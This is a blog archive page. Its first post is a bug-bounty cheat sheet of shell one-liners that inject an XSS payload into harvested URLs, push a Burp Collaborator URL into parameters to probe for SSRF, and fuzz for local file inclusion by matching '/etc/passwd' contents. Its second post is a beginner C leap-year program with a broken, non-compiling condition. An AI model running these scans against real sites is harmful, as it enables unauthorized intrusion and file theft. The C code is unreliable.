Posts

Showing posts from March 13, 2021

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

How to Find Leap Year in C Programming

 In this Article i am going to write a Program in C to find out that it is a Leap Year or Not. Please see the code and watch carefully. If you have any problem please comment below i will tell you about problem. First of all open your favourite editor for C coding. And write these code and then execute...... Note :: This is write in Ternary Operator  #include<stdio.h> int main(){ int yr; printf("Please enter a year "); scanf("%d", &yr); (yr%==0) ? printf("This is a Leap Year ") : printf("This is not a Leap Year "); return 0; }  

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C